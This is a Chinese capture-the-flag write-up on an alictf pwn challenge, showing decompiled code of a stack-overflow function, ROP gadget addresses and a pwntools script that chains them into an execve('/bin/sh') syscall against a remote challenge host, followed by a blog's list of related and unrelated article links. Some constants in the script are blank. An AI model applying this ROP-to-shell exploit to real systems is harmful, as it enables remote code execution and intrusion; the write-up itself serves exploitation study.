当程序开启了nx,但程序有syscall调用的时候。这时栈溢出的利用就可以通过rop来执行syscall的59号调用execve('/bin/sh',null,null),这是这次alictf一道pwn的心得。

ida配合gdb定位程序漏洞如下:

signed __int64 __fastcall sub_40108E(__int64 a1)

{

  signed __int64 result; // rax@3

  __int64 v2; // rdx@4

  int v3; // [sp+10h] [bp-40h]@1

  __int64 v4; // [sp+20h] [bp-30h]@1

  __int64 v5; // [sp+28h] [bp-28h]@1

  __int64 v6; // [sp+30h] [bp-20h]@1

  __int64 v7; // [sp+38h] [bp-18h]@1

  __int64 v8; // [sp+40h] [bp-10h]@1

  unsigned int v9; // [sp+48h] [bp-8h]@7

  int v10; // [sp+4Ch] [bp-4h]@4

  v4 = 0LL;

  v5 = 0LL;

  v6 = 0LL;

  v7 = 0LL;

  v8 = 0LL;

  v3 = ;

  sub_400330((__int64)&v3, a1, 80LL);           // 处理输入,首字母py绕过登陆检测,80字节的最后8字节控制ret

  if ( (_BYTE)v3 !=  || BYTE1(v3) !=  )

通过Ropgadget找到构造syscall的rop链如下:





0x46f208 : pop rax;ret

0x401823: pop rdi;ret

0x462873: pop rcx;ret

0x422568: mov dword ptr [rdi], ecx ; ret

0x46f205 : add rsp 0x58  ret

0x43ae29: pop rdx;pop rsi;ret

0x45f2a5:  syscall;ret






利用代码:




from pwn import *

#io=process('./vss')

io=remote('114.55.103.213',)

praxret=0x46f208

prdiret=0x401823

prcxret=0x0000000000462873 # pop rcx  ret

movrdircx = 0x422568

addespret=0x46f205 #add rsp 0x58  ret

prdxrsiret=0x43ae29

syscallret=0x45f2a5

pay='py'+'a'*

pay+=p64(addespret)+'a'*8                      #add rsp 0x58;ret

pay+=p64(praxret)+p64()                      #pop rax;ret

pay+=p64(prcxret)+'/bin/sh\x00'+p64(movrdircx) #pop rcx;ret;mov dword ptr [rdi], ecx ; ret

pay+=p64(prdxrsiret)+p64()+p64()             #pop rdx;pop rsi;ret

pay+=p64(syscallret)                           #syscall;ret

io.recvuntil('Password:\n')

io.sendline(pay)

io.interactive()






 
												


											
栈溢出之rop到syscall的更多相关文章
	

    
								
  1. Android内核栈溢出与ROP(CVE-2013-2597)
		
    一.准备 由于内核栈不可执行(NX),栈溢出利用需用到ROP.简单回顾一下ARM ROP. 漏洞演示代码如下,网上随便找了个. char *str="/system/bin/sh" ...
    
		
    2. 
						
  2. arm64 调试环境搭建及 ROP 实战
		
    前言 比赛的一个 arm 64 位的 pwn 题,通过这个题实践了 arm 64 下的 rop 以及调试环境搭建的方式. 题目文件 https://gitee.com/hac425/blog_data ...
    
		
    3. 
						
  3. 渗透入门rop
		
    原文链接:https://blog.csdn.net/guiguzi1110/article/details/77663430?locationNum=1&fps=1 基本ROP 随着NX保护 ...
    
		
    4. 
						
  4. Buuctf刷题:部分
		
    get_started_3dsctf_2016 关键词:ROP链.栈溢出.mprotect()函数 可参考文章(优质): https://www.cnblogs.com/lyxf/p/12113401 ...
    
		
    5. 
						
  5. D^3ctf两道 pwn
		
    这次 的D^3ctf 又是给吊打 难顶... 所以题都是赛后解出来的,在这感谢Peanuts师傅 unprintableV 看看保护: 看看伪代码,其实代码很少 void __cdecl menu() ...
    
		
    6. 
						
  6. PWN二进制漏洞学习指南
		
    目录 PWN二进制漏洞学习指南 前言 前置技能 PWN概念 概述 发音 术语 PWN环境搭建 PWN知识学习途径 常见漏洞 安全机制 PWN技巧 PWN相关资源博客 Pwn菜鸡小分队 PWN二进制漏洞 ...
    
		
    7. 
						
  7. syscall to rop
		
    前言 hitcon 2017 的 start 题,比较简单,练练手. 题目链接: https://gitee.com/hac425/blog_data/tree/master/hitcon2017 正 ...
    
		
    8. 
						
  8. 构建ROP链实现远程栈溢出
		
    通常情况下栈溢出可能造成的后果有两种,一类是本地提权另一类则是远程执行任意命令,通常C/C++并没有提供智能化检查用户输入是否合法的功能,同时程序编写人员在编写代码时也很难始终检查栈是否会发生溢出,这 ...
    
		
    9. 
						
  9. Linux pwn入门教程(3)——ROP技术
		
    作者:Tangerine@SAINTSEC 原文来自:https://bbs.ichunqiu.com/thread-42530-1-1.html 0×00 背景 在上一篇教程的<shellco ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. 微信公众平台开发(一) ——实现URL接入
			
    一.填写服务器配置 登录微信公众平台,点击开发者中心,点击“修改配置”按钮,填写服务器地址(URL).Token和EncodingAESKey.URL是开发者用来接收微信消息和事件的接口URL.Tok ...
    
			
    2. 
						
  2. php插入转义与查找转义
			
    //转义用于查找 function deepslashes($data) { //判断data表现形式 if(empty($data)) { return $data; } return is_arr ...
    
			
    3. 
						
  3. 单点登录CAS使用记(八):使用maven的overlay实现无侵入的改造CAS
			
    前期在学习CAS部署的过程中,都是网上各种教程,各种方案不停的尝试. 期间各种侵入改源码,时间久了,改了哪个文件,改了哪段配置,增加了哪段代码,都有可能混淆不清了. 而且最大的问题是,万一换个人来维护 ...
    
			
    4. 
						
  4. [转]javascript函数定义表达式和函数声明的区别
			
    在javascript中,函数有两种定义写法,函数定义表达式和函数声明,其例子分别如下所示: var test = function(x){ return x; } function test(x){ ...
    
			
    5. 
						
  5. Css预处理器实践之Sass、Less大比拼
			
    xwei | 2012-07-07 | 网页重构 什么是CSS预处理器? Css可以让你做很多事情,但它毕竟是给浏览器认的东西,对开发者来说,Css缺乏很多特性,例如变量.常量以及一些编程语法,代码难 ...
    
			
    6. 
						
  6. IE9的BUG?jQuery的BUG?
			
    本文转载自http://big-student.iteye.com/blog/1898213 在IE9和IE10中,当对一个html的样式初始了一个很大的left或者top时,使用jQuery的off ...
    
			
    7. 
						
  7. Linux程序设计笔记
			
    使用size命令查看二进制文件时,结果并不一定和预测占用内存大小一致,因为可能存在内存对齐,导致内存字节数比实际的更多 在C语言中,字符串常量存放在text segment中,在C++中却是存储在da ...
    
			
    8. 
						
  8. 制作EDM 邮件规范
			
    邮件模板最主要是保证兼容性,很多邮箱的过滤规则不同,因此邮件页面要使用最简单原始的代码实现内容展现. 一,采用table嵌套布局,避免用div布局,因为DIV布局会用到float等浮动样式,一些邮箱会 ...
    
			
    9. 
						
  9. (转)C#.NET使用TTS引擎实现文语转换
			
    (转)C#.NET使用TTS引擎实现文语转换 本文讲述使用微软TTS5.1语音引擎(中文)实现文本阅读和音频输出为WAV完美解决方案. 网上很多文章说的是要安装SAPI.51 SDK,而这个东西有好几 ...
    
			
    10. 
						
  10. Extjs中grid表头内容居中
			
    在每一列中加上header属性即可,源码: header:'<div style=" text-align: center; vertical-align: middle;" ...
    
			
    11.